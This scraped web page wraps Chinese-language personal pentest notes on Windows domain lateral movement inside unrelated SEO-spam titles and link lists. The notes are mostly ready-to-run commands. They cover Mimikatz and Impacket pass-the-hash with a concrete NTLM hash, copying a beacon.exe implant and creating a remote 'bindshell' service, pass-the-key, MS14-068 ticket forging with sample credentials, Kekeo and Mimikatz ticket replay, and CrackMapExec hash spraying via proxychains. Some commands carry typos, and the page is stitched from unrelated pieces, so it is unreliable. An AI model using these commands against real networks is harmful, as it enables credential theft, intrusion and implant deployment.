当前位置: 首页 > news >正文

快速搭建网站的工具有哪些哈尔滨市工程建设招投标网

快速搭建网站的工具有哪些,哈尔滨市工程建设招投标网,网站开发人员资质,谷歌优化工具用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-PTH-Mimikatz&NTLM 1、Mimikatz 2、impacket-at&ps&wmi&smb 二、域横向移动-PTK-Mimikatz&AES256 三、域横向移动-PTT-漏洞&Kekeo&Ticket 1、漏…

用途:个人学习笔记,有所借鉴,欢迎指正

目录

一、域横向移动-PTH-Mimikatz&NTLM

1、Mimikatz

2、impacket-at&ps&wmi&smb

二、域横向移动-PTK-Mimikatz&AES256

三、域横向移动-PTT-漏洞&Kekeo&Ticket

 1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证

2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试

四、Linux系统+Proxychains+CrackMapExec-密码喷射


一、域横向移动-PTH-Mimikatz&NTLM

PTH=Pass The Hash,通过密码散列值(通常是NTLM Hash)来进行攻击。
在域环境中,用户登录计算机时使用的域账号,计算机会用相同本地管理员账号和密码。
因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方
法登录到内网主机的其他计算机。另外注意在window Server 2012 R2之前使用到的密
码散列值是LM、NTLM,在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。

1、Mimikatz

mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
net use \\192.168.3.32/c$
copy beacon.exe \\192.168.3.32\c$
sc \\sqlserver create bindshell binpath="c:\4444.exe"
sc \\sqlserver start bindahell

2、impacket-at&ps&wmi&smb

Psexec -hashes :NTLM值 域名/域用户@域内ip地址
smbexec -hashes :NTLM值 域名/域用户@域内ip地址
wmiexec -hashes :NTLM值 域名/域用户@域内ip地址
python psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
python wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

二、域横向移动-PTK-Mimikatz&AES256

PTK=Pass The Key,当系统安装了KB2871997补丁且禁用了NTLM的时候,
那我们抓取到的ntlm hash也就失去了作用,但是可以通过PTK的攻击方式获得权限。

mimikatz sekurlsa::ekeys
mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值 

三、域横向移动-PTT-漏洞&Kekeo&Ticket

资源地址:

https://github.com/abatchy17/windowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/kekeo/releases

 1、漏洞-MS14068(webadmin权限)——利用漏洞生成的用户的新身份票据尝试认证

MS14-068是密钥分发中心(KDC)服务中的windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证

注意:成功不成功看DC域控漏洞补丁打没打

获取SID值:shell whoami/user
生成票据文件:shell ms14-068.exe -u webadmin@god.org -s
s-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45
清除票据连接:
shell klist purge
内存导入票据:
mimikatz kerberos:ptc TGT_webadmin@god.org.ccache
连接目标上线:
shell dir \\OWA2010CN-GOD\c$
shell net use \\OWA2010CN-GOD\c$
copy beacon.exe \\OWA2010CN-GOD/c$
sc \\OWA2010CN-GOD create bindshell binpath= "c:\beacon.exe"
sc \\OWA2010CN-GOD start bindshell

2、kekeo(高权限,需NTLM)——自己利用获取的NTLM生成新的票据尝试认证

因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,
我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗
缺点:票据是有有效期的,所以如果当前主机在连接过域控的话,有效期内可利用。

注意:成功率看ntlm哈希值的正确性

生成票据:shell kekeo "tgt::ask /user:Administrator /domain god.org /ntim:ocef208c6485269c20db2cad21734fe7" "exit"
导入票据: shell kekeo "kerberos::pttTGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi " "exit"
查看票据:shell klist
利用票据连接:shell dir \\owa2010cn-god\c$

3、mimikatz(高权限,需Ticket)——利用历史遗留票据重新认证尝试

导出票据:
mimikatz sekurlsa::tickets /export导入票据:
mimikatz kerberos::ptt C:
\Users\webadmin\Desktop\[0;22d3a]-2-1-40e00000-Administrator@krbtgt-god.org.kirbishell klist

四、Linux系统+Proxychains+CrackMapExec-密码喷射

CrackMapExec
https://github.com/Porchetta Industries/CrackMapExec
官方手册:https://mpgn.gitbook.io/crackmapexec/
部分案例:https://www.freebuf.com/sectool/184573.html

下载对应release,建立socks连接,设置socks代理,配置规则,调用!
Linux系统代理工具: Proxychains使用
安装使用:
https://blog.csdn.net/qq_53086690/article/details/121779832
代理配置:Proxychains.conf
代理调用:Proxychains 命令                 

#域用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c 
#本地用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --1ocal-auth    
http://www.yayakq.cn/news/952844/

相关文章:

  • 汽车制造行业网站模板镇江网页设计培训
  • 网站logo做黑页影楼网站建设
  • 作网站流程wordpress mu 安装
  • 佛山营销网站建设联系方式天美大象果冻星空的制作方法
  • 关于网站建设需要了解什么东西济南新风向网站建设
  • 网站软件开发百度推广二级代理商
  • 网站设计如何做动漫设计专业属于什么大类
  • 唐山哪个公司可以制作网站个人开发小程序多少钱
  • 网站域名服务器查询怎么做网站首页关键词
  • asp 网站运行wordpress footer设置
  • 泾川县住房和城乡建设局网站英语作文网站
  • 国外做多媒体展览的网站松江网站设计
  • 站牛网建设一个网站首先需要什么
  • 集团网站品牌建设特点广州网站建设商家
  • 水印网站和县网站定制
  • 那些外贸网站个人可以做比较好的平面设计网站
  • 做豆腐交流经验的网站晋城做网站公司
  • 南昌专门做网站的人淘宝客网站程序购米
  • 北京网站建设著名公司手机如何做api网站
  • 制作网站的花多少钱星空无限传媒在线观看电视剧赘婿
  • 辽宁建设工程信息网官网新网站如何进入wordpress文章内容宽度
  • 网站重新备案怎么做网站需求分析网站建设
  • 温州微网站制作公司电话wordpress做ftp
  • 百度搜索网站图片法国化妆品进口报关做网站
  • 高端婚纱摄影网站做国外服务器网站吗
  • 怎么建设回收网站重庆市建设工程信息网文件打不开
  • 驰业传媒网站建设厦门网络建站公司
  • 网站推广公司兴田德润在哪儿多功能创意产品设计
  • 主备网站服务器自动切换 win2003越秀企业网站建设
  • 看乱码的网站杭州做网站的优质公司哪家好